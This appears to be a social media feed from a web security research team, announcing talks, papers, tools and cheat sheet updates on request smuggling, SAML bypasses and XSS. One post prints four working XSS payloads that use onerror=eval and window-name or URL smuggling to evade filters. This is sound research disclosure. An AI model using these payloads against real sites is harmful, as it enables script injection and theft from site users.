PortSwigger Research

@portswiggerres

Web security research from the team at PortSwigger.

Joined 11.08.2023

Latest posts by PortSwigger Research @portswiggerres

Love web & AI security research? Want to do it full time on-site with myself, Gareth Heyes & Zak Fedotkin? Join the PortSwigger Research team - we're hiring!

apply.workable.com/portswigger/...

23.01.2026 10:36 👍 8 🔁 8 💬 0 📌 0

We've updated our XSS cheat sheet to include 9 new vectors from @garethheyes.co.uk! Here are the top three, you can find the rest here: portswigger.net/web-security...

10.11.2025 14:49 👍 175 🔁 20 💬 3 📌 0
RomHack 2025 - James “albinowax” Kettle - HTTP/1.1 Must Die! The Desync Endgame YouTube video by Cyber Saiyan

The recording of "HTTP/1.1 must die: the desync endgame" has now landed on YouTube. Enjoy! www.youtube.com/watch?v=zr5y...

08.10.2025 14:16 👍 15 🔁 3 💬 1 📌 0

I’m excited to announce that I’ll be presenting The Fragile Lock: Novel Bypasses for SAML Authentication at Black Hat Europe! In this talk, I’ll show how I was able to continuously bypass security patches to achieve complete auth bypass for major libraries. #BHEU @blackhatevents.bsky.social

07.10.2025 14:55 👍 26 🔁 6 💬 0 📌 0
RomHack Conference 2025 Live Stream YouTube video by Cyber Saiyan

HTTP/1.1 Must Die is coming to #romhack2025 as the keynote! In-person tickets are sold out but you can still watch the livestream. This is your last chance to catch it live - register to watch here:
www.youtube.com/watch?v=T009...

18.09.2025 13:40 👍 9 🔁 4 💬 0 📌 0

I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.

20.08.2025 15:02 👍 14 🔁 5 💬 1 📌 0

Watch HTTP/1.1 Must Die live today at 1630 PST!
- In person at #defcon33 track 1, main stage
- Livestream via YouTube: www.youtube.com/watch?v=ssln...

08.08.2025 18:46 👍 7 🔁 2 💬 2 📌 0
HTTP/1.1 Must Die Upstream HTTP/1.1 is inherently insecure, and routinely exposes millions of websites to hostile takeover. Join the mission to kill HTTP/1.1 now

The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: http1mustdie.com

06.08.2025 23:43 👍 40 🔁 22 💬 0 📌 2

It's easy to bash vulnerabilities with logos but... I couldn't resist, say hello to http1mustdie.com :)

18.07.2025 12:56 👍 13 🔁 3 💬 2 📌 0

I'm thrilled to announce "HTTP/1 Must Die! The Desync Endgame" is coming to #DEFCON33! This talk will feature multiple new classes of desync attack, mass exploitation spanning multiple CDNs, and over $200k in bug bounties. See you there!

10.06.2025 14:20 👍 43 🔁 11 💬 0 📌 1
The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling In this paper I will reveal the discovery of wide-spread cases of request tunnelling in applications powered by popular servers including IIS, Azure Front Door and AWS' application load balancer inclu...

Thrilled to finally release my latest research "The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling".

Desync vulnerabilities stemming from HP2 downgrading continue to plague even the largest vendors, have a read to find out how!

22.05.2025 16:03 👍 16 🔁 4 💬 1 📌 0
AMA: James Kettle on Burp Suite, AI & Security Research YouTube video by PortSwigger

The recording of my recent AMA with the Burp Suite Discord community has just landed on YouTube! 40 minutes of unscripted Q&A on security research, AI, and Burp Suite: youtu.be/mgmUZ9odkvU

27.05.2025 12:29 👍 18 🔁 7 💬 0 📌 1
<script>throw onerror=eval,{
   lineNumber:1,columnNumber:1,fileName:1,message:name
}</script>
<svg onload="throw top.onerror=eval,{
   lineNumber:1,columnNumber:1,fileName:1,message:'/*'+URL
}">

<body onload="throw onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+location}">
<script>throw lineNumber=columnNumber=fileName=message=name,onerror=eval,{lineNumber,columnNumber,fileName,message}</script>

Firefox now opens the door to URL-based XSS payload smuggling too. Yep, even more ways to sneak past filters using the window name and clever URL tricks. Link to vectors👇

portswigger.net/web-security...

27.05.2025 13:55 👍 10 🔁 3 💬 0 📌 0
RomHack Conference, Training and Camp RomHack is a format made by the non-profit association Cyber Saiyan and composed by a Conference a Training session and a Hacker Camp.

I'm excited to announce I'll be delivering the keynote at RomHack this September! I can't share the title just yet but it's going to be a good one. See you in Rome!
romhack.io

17.03.2025 12:38 👍 19 🔁 2 💬 0 📌 1

I’m excited to introduce Namespace Confusion, a novel attack discovered during Gareth's and my SAML Roulette: The Hacker Always Wins research. We uncovered a brutal attack on XML signature validation that destroys authentication in Ruby-SAML!

18.03.2025 15:01 👍 23 🔁 6 💬 0 📌 0
SAML roulette: the hacker always wins Introduction In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library

You might have noticed that the recent SAML writeups omit some crucial details. In "SAML roulette: the hacker always wins", we share everything you need to know for a complete unauthenticated exploit on ruby-saml, using GitLab as a case-study.

portswigger.net/research/sam...

18.03.2025 14:57 👍 53 🔁 23 💬 0 📌 4

We've just released Shadow Repeater, for AI-enhanced manual testing. Simply use Burp Repeater as you normally would, and behind the scenes Shadow Repeater will learn from your attacks, try payload permutations, and report any discoveries via Organizer.

portswigger.net/research/sha...

20.02.2025 13:24 👍 21 🔁 12 💬 2 📌 3
Top 10 Web Hacking Techniques of 2024 - James Kettle - ASW #318 YouTube video by Security Weekly - A CRA Resource

@jameskettle.com casually dropping info on the craziest sounding AI-enabled burp extension. Can you imagine messing about with a suspicious LFI candidate in repeater and without you doing anything differently than you do today, burp suddenly spits back the right payload?

18.02.2025 15:37 👍 6 🔁 5 💬 1 📌 0

We've updated our URL validation bypass cheat sheet with this shiny Domain allow list bypass payload contributed by dyak0xdb!

06.02.2025 09:17 👍 28 🔁 9 💬 1 📌 0
Top 10 web hacking techniques of 2024 Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2024! portswigger.net/research/top...

04.02.2025 15:02 👍 66 🔁 36 💬 2 📌 5

I'm super proud to announce my weekend project and latest #burpsuite extension written in Kotlin! 👾 I love hacking, finding problems or challenges during and the ability to fix them whilst improving my code-foo.

Introducing 🗒️ StickyBurp! 🗒️ -> github.com/GangGreenTem...

@portswiggerres.bsky.social

23.12.2024 21:05 👍 9 🔁 3 💬 0 📌 1
Top ten web hacking techniques of 2024: nominations open Nominations are now open for the top 10 new web hacking techniques of 2024! Every year, security researchers from all over the world share their latest findings via blog posts, presentations, PoCs, an

Nominations are now open for the Top 10 Web Hacking Techniques of 2024! Browse the contestants and submit your own here:
portswigger.net/research/top...

08.01.2025 14:09 👍 28 🔁 19 💬 1 📌 4
Bypassing WAFs with the phantom $Version cookie HTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I'll explore some dangerous, lesser-known

Did you know you can use an ancient magic cookie to downgrade parsers and bypass WAFs?! Hope you enjoy this quality bit of RFC-diving from @d4d89704243.bsky.social!
portswigger.net/research/byp...

04.12.2024 15:17 👍 73 🔁 27 💬 1 📌 5

We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPj...

17.11.2024 11:17 👍 35 🔁 9 💬 0 📌 2
DEF CON 32 - Splitting the email atom exploiting parsers to bypass access controls - Gareth Heyes YouTube video by DEFCONConference

In case you missed it...the DEF CON video of my talk 'Splitting the Email Atom' is finally here! 🚀 Watch me demonstrate how to turn an email address into RCE on Joomla, bypass Zero Trust defences, and exploit parser discrepancies for misrouted emails. Don’t miss it:

youtu.be/JERBqoTllaE?...

22.11.2024 07:27 👍 95 🔁 30 💬 2 📌 0
DEF CON 32 - Gotta Cache ‘em all bending the rules of web cache exploitation - Martin Doyhenard YouTube video by DEFCONConference

If you like bounties, I highly recommend this presentation from Martin Doyhenard on novel web cache deception techniques. It comes with Web Security Academy labs too!
www.youtube.com/watch?v=70yy...

26.11.2024 14:33 👍 62 🔁 16 💬 3 📌 0

Hello world

11.08.2023 21:36 👍 11 🔁 1 💬 0 📌 0